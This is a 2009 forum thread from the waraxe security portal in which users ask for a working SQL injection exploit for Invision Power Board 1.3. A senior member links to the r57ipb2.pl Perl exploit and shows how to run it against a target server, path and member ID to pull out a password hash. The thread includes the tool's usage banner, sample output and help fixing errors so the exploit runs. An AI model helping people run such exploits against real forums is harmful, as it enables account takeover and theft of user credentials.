Waraxe IT Security Portal
Login or Register
November 15, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 77
Members: 0
Total: 77
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Invision Power Board -> IPB 1.3?
Post new topicReply to topic View previous topic :: View next topic
IPB 1.3?
PostPosted: Thu Sep 24, 2009 11:31 am Reply with quote
tox1c
Active user
Active user
Joined: Sep 22, 2009
Posts: 41




Is there a working up to date SQL Injection Exploit for IPB v1.3.

I cant seem to find a working one.
I tried the one 2.3.5 by waraxe but it didnt work.
?
View user's profile Send private message
PostPosted: Thu Sep 24, 2009 6:33 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Search in threads.I give exploit for ipb 1.3 final
View user's profile Send private message
PostPosted: Thu Sep 24, 2009 9:23 pm Reply with quote
tox1c
Active user
Active user
Joined: Sep 22, 2009
Posts: 41




ive searched but cant find
View user's profile Send private message
PostPosted: Fri Sep 25, 2009 1:03 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




http://www.waraxe.us/ftopict-768-ipb.html+1+3+final+exploit
View user's profile Send private message
PostPosted: Fri Sep 25, 2009 4:27 pm Reply with quote
nuker
Active user
Active user
Joined: Aug 16, 2009
Posts: 39




thats saved as a pl right? its executed via perl. I know that, however i cant figure out exactly how to use it. Do you have to modify the code according to your needs before executing it prompts you to input board URL and all that after you execute it.

Thanks.
View user's profile Send private message
PostPosted: Fri Sep 25, 2009 6:02 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




I think this is write on english:

Code:
## r57ipb2.pl blah.com /ipb13/ 1 0 <-------------------
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1 <----------------------------
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
View user's profile Send private message
PostPosted: Sat Sep 26, 2009 10:13 am Reply with quote
nuker
Active user
Active user
Joined: Aug 16, 2009
Posts: 39




okay, lets say the target board is myass.com/forum/ so i tried by changing that to this

## r57ipb2.pl myass.com /forum/ 1 0 <-------------------
## [~] SERVER : myass.com
## [~] PATH : /forum/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl myass.com /forum/ 1 1 <----------------------------
## [~] SERVER : myass.com
## [~] PATH : /forum/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]




but after executing it from command.exe i still get this


Code:
Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]

[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute

targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)

e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru




So i really dont know what im doing wrong. That r57ipb2.pl is afile i have to have in order for this script to work?
View user's profile Send private message
PostPosted: Sat Sep 26, 2009 3:03 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Save script on the PC.Call him myscript.pl

I think you us windows

Start--->run-->cmd OK

In command prompt type

myscript.pl myass.com /forum/ 1 0

You need to install Perl on the PC.
View user's profile Send private message
PostPosted: Sat Sep 26, 2009 3:58 pm Reply with quote
nuker
Active user
Active user
Joined: Aug 16, 2009
Posts: 39




Thank you. That was a great explanation. I finally got it to work, however it says [failed]. Im testing it with a 1.2 of my own so its not patched or anything.

Thank you for your time.
View user's profile Send private message
PostPosted: Sun Sep 27, 2009 1:45 am Reply with quote
Poison
Advanced user
Advanced user
Joined: Jul 30, 2008
Posts: 126




i get this error when trying to execute the exploit in CMD

C:\Perl>perl hi.pl
Bareword found where operator expected at hi.pl line 44, near ")Sad'password"
(Missing operator before Sad'password?)
String found where operator expected at hi.pl line 48, near "$request = '"
(Might be a runaway multi-line '' string starting on line 44)
(Missing semicolon on previous line?)
Bareword found where operator expected at hi.pl line 48, near "$request = 'http"

(Missing operator before http?)
Number found where operator expected at hi.pl line 60, near "IPB 2."
(Might be a runaway multi-line '' string starting on line 4Cool
(Do you need to predeclare IPB?)
Number found where operator expected at hi.pl line 60, near "IPB 1."
(Do you need to predeclare IPB?)
Bareword found where operator expected at hi.pl line 77, near "print (($target)?
('MEMBER_LOGIN_KEY"
(Might be a runaway multi-line '' string starting on line 60)
(Do you need to predeclare print?)
Bareword found where operator expected at hi.pl line 77, near "')Sad'PASSWORD"
(Missing operator before PASSWORD?)
syntax error at hi.pl line 44, near ")Sad'password"
Can't find string terminator "'" anywhere before EOF at hi.pl line 77.
View user's profile Send private message
PostPosted: Sun Sep 27, 2009 11:26 am Reply with quote
nuker
Active user
Active user
Joined: Aug 16, 2009
Posts: 39




if you copied it directly from the board is most likely the code its messed up because of the smilies. So try to get the original one or remove the smilies yourself (such as Sad and Cool) and then it will work.
View user's profile Send private message
PostPosted: Mon Sep 28, 2009 10:39 am Reply with quote
PJG
Beginner
Beginner
Joined: Sep 28, 2009
Posts: 1




When I try this it says:

syntax error at C:\scriptname.pl line 38, next char )
"use" not allowed in expression at C:\bruteipb.pl line 38, at end of line
Execution of C:\scriptname.pl aborted due to compilation errors.

It's referring to this line:

use IO::Socket;

what can I do about this?
View user's profile Send private message
IPB 1.3?
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.045 Seconds